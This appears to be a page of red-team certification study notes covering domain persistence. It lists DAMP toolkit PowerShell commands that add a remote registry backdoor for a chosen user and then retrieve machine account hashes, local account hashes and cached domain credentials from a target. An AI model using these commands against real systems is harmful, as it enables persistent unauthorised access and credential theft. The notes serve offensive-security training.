> For the complete documentation index, see [llms.txt](https://omar-4.gitbook.io/omar-docs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://omar-4.gitbook.io/omar-docs/crtp-notes/domain-persistence/acl/securitydescriptor-remote-registry.md).

# SecurityDescriptor - Remote Registry

Using the DAMP toolkit

```
. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrieval
```

**Using DAMP with admin privs on remote machine**

```
Add-RemoteRegBackdoor -Computername <computername> -Trustee <username> -Verbose
```

**Retrieve machine account hash from local machine**

```
Get-RemoteMachineAccountHash -Computername <computername> -Verbose
```

**Retrieve local account hash from local machine**

```
Get-RemoteLocalAccountHash -Computername <computername> -Verbose
```

**Retrieve domain cached credentials from local machine**

```
Get-RemoteCachedCredential -Computername <computername> -Verbose
```
